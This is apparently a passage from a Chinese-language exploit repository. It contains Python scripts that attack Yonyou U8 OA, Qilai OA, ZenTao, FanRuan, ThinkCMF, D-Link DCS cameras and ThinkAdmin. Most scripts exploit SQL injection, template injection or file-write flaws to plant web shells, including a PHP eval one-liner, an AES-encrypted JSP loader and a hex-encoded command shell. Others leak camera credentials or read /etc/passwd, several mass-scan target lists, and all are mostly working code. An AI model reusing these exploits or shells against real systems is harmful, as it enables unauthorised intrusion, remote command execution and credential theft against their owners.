requests.get(url=webshell_url, timeout=10, verify=False, headers=headers) 55 | print("\033[32m[+] 正在请求 : {}/page/exportImport/fileTransfer/update.jsp\033[0m".format(target_url)) 56 | if '666' in response.text and response.status_code == 200: 57 | print("\033[32m[+] 目标 {} 成功上传 webshell : {}/page/exportImport/fileTransfer/update.jsp\033[0m".format(target_url,target_url)) 58 | print("\033[32m[+] webshell地址:{}/page/exportImport/fileTransfer/update.jsp \033[0m".format(target_url)) 59 | print("\033[32m[+] 冰蝎3默认马 pass :rebeyond \033[0m".format(target_url)) 60 | else: 61 | print("\033[31m[x] 目标漏洞无法利用,写入失败 \033[0m") 62 | sys.exit(0) 63 | 64 | except Exception as e: 65 | print("\033[31m[x] 目标漏洞无法利用,写入失败 {} \033[0m".format(e)) 66 | sys.exit(0) 67 | 68 | if __name__ == '__main__': 69 | title() 70 | target_url = str(input("\033[35m请输入需要测试的url地址:\033[0m")) 71 | POC_1(target_url) 72 | 
-------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/getshell_exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | import json 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | 10 | def title(): 11 | print('+------------------------------------------') 12 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 13 | print('+ \033[36m使用格式: python3 getshell_exp.py \033[0m') 14 | print('+ \033[36mURL地址: http://xxx.xxx.xxx.xxx \033[0m') 15 | print('+------------------------------------------') 16 | 17 | def POC_1(target_url): 18 | vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" 19 | try: 20 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 21 | response = requests.get(url=vuln_url, verify=False, timeout=5) 22 | if '序号' in response.text and "@@basedir" in response.text and response.status_code == 200: 23 | OA_dir = re.findall(r'>(.*)\\mysql\\', response.text)[0] 24 | OA_dir = OA_dir.replace("\\","/") 25 | print("\033[32m[+]目标 {} 存在SQL注入漏洞".format(target_url)) 26 | webshell_name = "update_{}.jsp".format(random.randint(1,5)) 27 | OA_dir = OA_dir + "/tomcat/webapps/yyoa/{}".format(webshell_name) 28 | POC_2(target_url, OA_dir, webshell_name) 29 | else: 30 | print("\033[31m[x]目标 {} 不存在SQL注入漏洞 \033[0m".format(target_url)) 31 | except Exception as e: 32 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url), e) 33 | 34 | def POC_2(target_url, OA_dir, webshell_name): 35 | vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%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%27)%20%20into%20outfile%20%27{}%27".format(OA_dir) 36 | webshell_dir = target_url +"/yyoa/"+ webshell_name 37 | try: 38 | 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 39 | response = requests.get(url=vuln_url, verify=False, timeout=5) 40 | if 'already' in response.text and response.status_code == 200: 41 | print("\033[32m[+]文件写入木马上传失败,目标已存在相同文件,请重新运行\033[0m") 42 | elif "No Data" in response.text and response.status_code == 200: 43 | print("\033[32m[+]文件写入木马上传成功,上传路径为 {}\033[0m".format(webshell_dir)) 44 | print("\033[32m[+]请使用冰蝎连接,密码为: bxmm\033[0m") 45 | else: 46 | print("\033[31m[x] 目标 {} 木马上传失败 \033[0m".format(target_url)) 47 | except Exception as e: 48 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url), e) 49 | 50 | 51 | if __name__ == '__main__': 52 | title() 53 | target_url = str(input("\033[35m请输入需要检测的URL地址:\033[0m")) 54 | POC_1(target_url) 55 | -------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 启莱OA treelist.aspx SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 11 | print('+ \033[36m文件名: url.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | #随机ua 15 | def get_ua(): 16 | first_num = random.randint(55, 62) 17 | third_num = random.randint(0, 3200) 18 | fourth_num = random.randint(0, 140) 19 | os_type = [ 20 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 21 | '(Macintosh; Intel Mac OS X 10_12_6)' 22 | ] 23 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 24 | 25 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 26 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 27 | ) 28 | return ua 29 | 30 | 31 | def poc(url): 32 | vuln_url = 
url + "/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1" 33 | headers = { 34 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 35 | } 36 | try: 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 39 | if "nvarchar" in response.text and response.status_code == 500: 40 | with open('success.txt', 'a', encoding='utf8') as vul: 41 | vul.write("{} \n".format(vuln_url)) 42 | print("\033[32m[+]目标 {} 存在SQL注入漏洞 \n[+]响应地址:\n{} \033[0m".format(url, vuln_url)) 43 | else: 44 | print("\033[31m[x]目标 {} 不存在SQL注入漏洞 \033[0m".format(target_url)) 45 | except Exception as e: 46 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 47 | 48 | 49 | def Scan(file_name): 50 | header={"User-Agent": get_ua(),} 51 | with open(file_name, "r", encoding='utf8') as scan_url: 52 | for url in scan_url: 53 | if url[:4] != "http": 54 | url = "http://" + url 55 | url = url.strip('\n') 56 | try: 57 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 58 | httpError = False 59 | try: 60 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 61 | except Exception as e: 62 | httpError = True 63 | if not httpError and req.status_code == 200: 64 | print("\033[32m[+]正在请求{}".format(url)) 65 | else: 66 | url = url.replace("http","https") 67 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 68 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 69 | if req.status_code == 200: 70 | print("\033[32m[+]正在请求{}".format(url)) 71 | else: 72 | pass 73 | except Exception as e: 74 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 75 | else: 76 | pass 77 | try: 78 | poc(url) 79 | 80 | except Exception as e: 81 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 82 | continue 83 | if __name__ == '__main__': 84 | title() 85 | file_name = 
str(input("\033[35m请输入需要检测的文件名:\033[0m")) 86 | Scan(file_name) 87 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 11 | print('+ \033[36m文件名: url.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | #随机ua 15 | def get_ua(): 16 | first_num = random.randint(55, 62) 17 | third_num = random.randint(0, 3200) 18 | fourth_num = random.randint(0, 140) 19 | os_type = [ 20 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 21 | '(Macintosh; Intel Mac OS X 10_12_6)' 22 | ] 23 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 24 | 25 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 26 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 27 | ) 28 | return ua 29 | 30 | 31 | def poc(url): 32 | vuln_url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" 33 | headers = { 34 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 35 | } 36 | try: 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 39 | if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200: 40 | with open('success.txt', 'a', encoding='utf8') as vul: 41 | vul.write("{} \n".format(url)) 42 | print("\033[32m[+]目标 {} 存在SQL注入漏洞 \n[+]响应地址:\n{} \033[0m".format(url, vuln_url)) 43 | else: 44 | print("\033[31m[x]目标 {} 
不存在SQL注入漏洞 \033[0m".format(target_url)) 45 | except Exception as e: 46 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 47 | 48 | 49 | def Scan(file_name): 50 | header={"User-Agent": get_ua(),} 51 | with open(file_name, "r", encoding='utf8') as scan_url: 52 | for url in scan_url: 53 | if url[:4] != "http": 54 | url = "http://" + url 55 | url = url.strip('\n') 56 | try: 57 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 58 | httpError = False 59 | try: 60 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 61 | except Exception as e: 62 | httpError = True 63 | if not httpError and req.status_code == 200: 64 | print("\033[32m[+]正在请求{}".format(url)) 65 | else: 66 | url = url.replace("http","https") 67 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 68 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 69 | if req.status_code == 200: 70 | print("\033[32m[+]正在请求{}".format(url)) 71 | else: 72 | pass 73 | except Exception as e: 74 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 75 | else: 76 | pass 77 | try: 78 | poc(url) 79 | 80 | except Exception as e: 81 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 82 | continue 83 | if __name__ == '__main__': 84 | title() 85 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 86 | Scan(file_name) 87 | -------------------------------------------------------------------------------- /zentao-getshell/exp.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import requests 3 | import base64 4 | import re 5 | import sys 6 | import os 7 | import json 8 | 9 | 10 | banner = ''' 11 | ________ _______ .__ __. .___________. ___ ______ 12 | | / | ____|| \ | | | | / \ / __ \ 13 | `---/ / | |__ | \| | `---| |----` / ^ \ | | | | 14 | / / | __| | . 
` | | | / /_\ \ | | | | 15 | / /----.| |____ | |\ | | | / _____ \ | `--' | 16 | /________||_______||__| \__| |__| /__/ \__\ \______/ 17 | 18 | v8.2 - 9.2.1 Getshell 19 | 20 | python by jas502n 21 | 22 | usage: python exp.py http://127.0.0.1:81/zentao webshell.php 23 | 24 | ''' 25 | print banner 26 | 27 | def get_web_dir(url,filename): 28 | if url[-1] == '/': 29 | url = url[:-1] 30 | else: 31 | url = url 32 | 33 | payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}''' 34 | base64encode_str = base64.b64encode(payload) 35 | web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_str 36 | version_url = url + "/zentao/index.php?mode=getconfig" 37 | r0 = requests.get(url=version_url) 38 | json_str = json.loads(r0.text) 39 | print "Cuurent Version= " + json_str['version'] 40 | print '\n' + web_dir 41 | 42 | headers = { 43 | "Referer":"http://127.0.0.1:81/zentao", 44 | "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 45 | } 46 | 47 | r= requests.get(url=web_dir, headers=headers) 48 | if r.status_code==200 and 'SELECT' in r.content: 49 | print '\n' 50 | print r.content 51 | m = re.compile(r'.*in <strong>(.*)</strong> on') 52 | print 53 | www_dir = m.findall(r.content)[0] 54 | www_root = www_dir.replace('\\', "//") 55 | print www_root 56 | m = re.compile(r'(.*)framework',re.DOTALL) 57 | 58 | # print '>>>>WWWROOT INSTALL: ' + 59 | get_shell = "select '<?php @eval($_POST[1])?>' into outfile '%s'" % (m.findall(www_root)[0] + 'www//' + filename) 60 | print '\n%s\n' % get_shell 61 | hex_str = get_shell.encode('hex') 62 | payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str 63 | getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(payload1) 64 | # print "GetShell_URL=\n\n%s" % getshell_url 65 | 66 | headers = { 67 | 
"Referer":"%s/zentao"%url, 68 | "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 69 | } 70 | r1 = requests.get(url=getshell_url,headers=headers) 71 | if r1.status_code == 200 and 'ID' in r1.content: 72 | print getshell_url 73 | 74 | webshell = url + "/zentao/" + filename 75 | r2 = requests.get(url=webshell) 76 | if r2.status_code == 200: 77 | print "\n\n>>>>Webshell: \n%s" % webshell 78 | else: 79 | print "No Webshell Exit!" 80 | else: 81 | print "No Send Success into file!" 82 | 83 | 84 | else: 85 | print "No Exit!" 86 | 87 | 88 | 89 | 90 | if __name__ == "__main__": 91 | # url = "http://127.0.0.1:81/" 92 | url = sys.argv[1] 93 | filename = sys.argv[2] 94 | get_web_dir(url,filename) 95 | -------------------------------------------------------------------------------- /帆软OA/帆软OA_V9getshell/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 4 | 5 | def title(): 6 | print('+------------------------------------------') 7 | print('+ \033[34mVersion: 帆软OA V9 getshell \033[0m') 8 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 9 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 10 | print('+ \033[36mFile >>> ip.txt \033[0m') 11 | print('+------------------------------------------') 12 | 13 | def POC_1(target_url): 14 | vuln_url_1 = target_url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/index1.jsp" 15 | print('\033[36m[o] 正在请求: {}'.format(vuln_url_1)) 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 18 | "Content-Type": "application/x-www-form-urlencoded", 19 | } 20 | data = '''{"__CONTENT__":"<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader 
c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>","__CHARSET__":"UTF-8"}''' 21 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 22 | response = requests.post(url=vuln_url_1, headers=headers, timeout=5, data=data, verify=False) 23 | webshell_url = target_url + "/WebReport/index1.jsp" 24 | try: 25 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 26 | response = requests.get(url=webshell_url, timeout=5, verify=False, headers=headers) 27 | if response.status_code == 200 : 28 | with open('webshell.txt', 'a', encoding='utf8') as vu: 29 | vu.write("目标 {} 被上传木马: {}/WebReport/index1.jsp\n".format(target_url, target_url)) 30 | print("\033[32m[+] 目标 {} 被上传木马: {}/WebReport/index1.jsp \033[0m".format(target_url, target_url)) 31 | except Exception as e: 32 | print("\033[31m[x] 请求报错 \033[0m".format(e)) 33 | 34 | def Scan(file_name): 35 | with open(file_name, "r", encoding='utf8') as scan_url: 36 | for url in scan_url: 37 | if url[:4] != "http": 38 | url = "http://" + url 39 | url = url.strip('\n') 40 | try: 41 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 42 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 43 | if req.status_code == 200: 44 | print("\033[32m[+] 正在请求{}".format(url)) 45 | else: 46 | url = url.replace("http","https") 47 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 48 | if req.status_code == 200: 49 | print("\033[32m[+] 正在请求{}".format(url)) 50 | else: 51 | pass 52 | except Exception as e: 53 | print("\033[31m[x] "+url+"访问失败 \033[0m".format(e)) 54 | try: 55 | POC_1(url) 56 | 57 | except 
Exception as e: 58 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 59 | continue 60 | if __name__ == '__main__': 61 | title() 62 | file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) 63 | Scan(file_name) 64 | -------------------------------------------------------------------------------- /ThinkCMF/ThinkCMF_getshell_exp.py: -------------------------------------------------------------------------------- 1 | import urllib3 2 | import requests,sys,json 3 | from argparse import ArgumentParser 4 | from time import time 5 | from urllib import parse 6 | import threadpool 7 | 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | filename = sys.argv[1] 10 | url_list=[] 11 | t = open('shell.txt','w') 12 | 13 | def ThinkCMF_getshell(url): 14 | vuln_url = url + R'''/index.php?a=fetch&templateFile=public/inde&prefix=%27%27&content=<php>file_put_contents('92379705dac844c0.php','%3c%3f%70%68%70%0d%0a%65%63%68%6f%20%6d%64%35%28%22%54%68%69%6e%6b%43%4d%46%22%29%3b%0d%0a%20%20%20%20%69%66%28%69%73%73%65%74%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%29%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%63%6d%64%20%3d%20%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%73%79%73%74%65%6d%28%24%63%6d%64%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%2f%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%64%69%65%3b%0d%0a%20%20%20%20%7d%0d%0a%70%68%70%69%6e%66%6f%28%29%3b%0d%0a%3f%3e')</php>''' 15 | r = requests.get(vuln_url,timeout=15,verify=False) 16 | response_str = json.dumps(r.headers.__dict__['_store']) 17 | # print(response_str) #响应头 18 | if r.status_code == 200 and 'PHP' in response_str: 19 | print ("[+]" + str(r.headers.get('Server'))) 20 | print ("[+]" + str(r.headers.get('X-Powered-By'))) 21 | check_shell(url) 22 | else: 23 | print ("[-]%s :No Exit ThinkCMF 
Vuln" %url) 24 | 25 | def check_shell(url): 26 | shell_url = url + '/92379705dac844c0.php' 27 | r = requests.get(shell_url,timeout=15,verify=False) 28 | if r.status_code == 200 and "92379705dac844c0" in r.text: 29 | print ("\033[32m[+]CMD Shell url:\033[0m") 30 | print ("\033[32m[+]%s/92379705dac844c0.php?cmd=whoami\033[0m" %url) 31 | t.write("%s/92379705dac844c0.php?cmd=whoami\n" %url) 32 | print ("\033[32m[+]蚁剑无文件连接url:\033[0m") 33 | shell2_url=url + R'''/index.php?a=fetch&templateFile=public/inde&prefix=%27%27&content=%3C?php%20@eval($_POST[%27m2%27]);?%3E''' 34 | print ("\033[32m[+]%s\033[0m" %shell2_url) 35 | print ("\033[32m[+]pass: m2\033[0m") 36 | else: 37 | print ("[-]%s :No Exit ThinkCMF Vuln" %url) 38 | 39 | 40 | def multithreading(url_list, pools=5): 41 | works = [] 42 | for i in url_list: 43 | works.append(i) 44 | pool = threadpool.ThreadPool(pools) 45 | reqs = threadpool.makeRequests(ThinkCMF_getshell, works) 46 | [pool.putRequest(req) for req in reqs] 47 | pool.wait() 48 | 49 | if __name__ == '__main__': 50 | show = r''' 51 | 52 | _____ _ _ _ _____ ___ _________ 53 | |_ _| | (_) | | / __ \| \/ || ___| 54 | | | | |__ _ _ __ | | _| / \/| . . 
|| |_ _____ ___ __ 55 | | | | '_ \| | '_ \| |/ / | | |\/| || _| / _ \ \/ / '_ \ 56 | | | | | | | | | | | <| \__/\| | | || | | __/> <| |_) | 57 | \_/ |_| |_|_|_| |_|_|\_\\____/\_| |_/\_| \___/_/\_\ .__/ 58 | ______ | | 59 | |______| |_| 60 | 61 | getshell_exp by m2 62 | ''' 63 | print(show + '\n') 64 | arg=ArgumentParser(description='ThinkCMF_getshell_exp By m2') 65 | arg.add_argument("-u", 66 | "--url", 67 | help="Target URL; Example:http://ip:port") 68 | arg.add_argument("-f", 69 | "--file", 70 | help="Target URL; Example:url.txt") 71 | args=arg.parse_args() 72 | url=args.url 73 | filename=args.file 74 | start=time() 75 | if url != None and filename == None: 76 | url=parse.urlparse(url) 77 | url=url.scheme + '://' + url.netloc 78 | ThinkCMF_getshell(url) 79 | elif url == None and filename != None: 80 | for i in open(filename): 81 | i=i.replace('\n','') 82 | url=parse.urlparse(i) 83 | url=url.scheme + '://' + url.netloc 84 | url_list.append(url) 85 | multithreading(url_list,10) 86 | end=time() 87 | t.close() 88 | print('任务完成,用时%d' %(end-start)) 89 | -------------------------------------------------------------------------------- /D-Link_DCS系列监控/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mTitle: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 \033[0m') 12 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 13 | print('+ \033[36m文件名: url.txt \033[0m') 14 | print('+------------------------------------------') 15 | 16 | #随机ua 17 | def get_ua(): 18 | first_num = random.randint(55, 62) 19 | third_num = random.randint(0, 3200) 20 | fourth_num = random.randint(0, 140) 21 | os_type = [ 22 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 23 | '(Macintosh; Intel 
Mac OS X 10_12_6)' 24 | ] 25 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 26 | 27 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 28 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 29 | ) 30 | return ua 31 | 32 | def POC_1(target_url): 33 | vuln_url = target_url + "/config/getuser?index=0" 34 | headers = { 35 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 36 | } 37 | try: 38 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 39 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 40 | print("\033[36m[+] 正在请求 {}/config/getuser?index=0 \033[0m".format(target_url)) 41 | if 'priv' in response.text and response.status_code == 200: 42 | res=response.text.strip() 43 | result=re.findall(r'(.*)\r\npriv',res,re.S) 44 | result=result[0] 45 | with open('success.txt', 'a', encoding='utf8') as vul: 46 | vul.write("{}\n{}\n".format(target_url,result)) 47 | print("\033[32m[+] 目标 {} 存在漏洞 \033[0m".format(target_url)) 48 | else: 49 | print("\033[31m[x] 请求失败 \033[0m") 50 | 51 | except Exception as e: 52 | print("\033[31m[x] 请求失败 \033[0m", e) 53 | 54 | def Scan(file_name): 55 | header={"User-Agent": get_ua(),} 56 | with open(file_name, "r", encoding='utf8') as scan_url: 57 | for url in scan_url: 58 | if url[:4] != "http": 59 | url = "http://" + url 60 | url = url.strip('\n') 61 | try: 62 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 63 | httpError = False 64 | try: 65 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 66 | except Exception as e: 67 | httpError = True 68 | if not httpError and req.status_code == 200: 69 | print("\033[32m[+] 正在请求 {}".format(url)) 70 | else: 71 | url = url.replace("http","https") 72 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 73 | req = requests.get(url=url, headers=header, 
verify=False, timeout=10) 74 | if req.status_code == 200: 75 | print("\033[32m[+] 正在请求 {}".format(url)) 76 | else: 77 | pass 78 | except Exception as e: 79 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 80 | else: 81 | pass 82 | try: 83 | POC_1(url) 84 | 85 | except Exception as e: 86 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 87 | continue 88 | 89 | 90 | if __name__ == '__main__': 91 | title() 92 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 93 | Scan(file_name) 94 | 95 | -------------------------------------------------------------------------------- /ThinkAdmin/ThinkAdminScan.py: -------------------------------------------------------------------------------- 1 | # by : YaunSky 2 | # 时间 : 2020-12-06 3 | # 内容 : ThinkAdmin 任意文件读取 (脚本读取/etc/passwd) 4 | 5 | 6 | import requests 7 | import json 8 | import base64 9 | import urllib3 10 | import random 11 | 12 | urllib3.disable_warnings() 13 | requests.packages.urllib3.disable_warnings() 14 | 15 | USER_AGENTS = [ 16 | "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", 17 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", 18 | "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", 19 | "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko", 20 | "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", 21 | "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", 22 | "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", 23 | "Mozilla/5.0 (Linux; U; Android 
2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", 24 | "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", 25 | "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10", 26 | "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13", 27 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+", 28 | "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0", 29 | "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124", 30 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)", 31 | ] 32 | 33 | headers = { 34 | "User-Agent" : random.choice(USER_AGENTS), 35 | "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 36 | "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 37 | "Accept-Encoding" : "gzip, deflate", 38 | "Connection" : "close", 39 | "Upgrade-Insecure-Requests" : "1" 40 | } 41 | session = requests.session() 42 | res = open("url.txt","r") #url.txt 存放探目标的文件 43 | for ip in res.readlines(): 44 | url = ip.strip()+"/admin/login.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s" 45 | if url[:4] != "http": 46 | url = "http://" + url 47 | try: 48 | req = session.get(url=url, headers=headers, verify=False, timeout=5) 49 | if req.status_code == 200: 50 | print("\033[32m[+] 正在请求{}".format(url)) 51 | else: 52 | url = url.replace("http","https") 53 | req = session.get(url=url, headers=headers, 
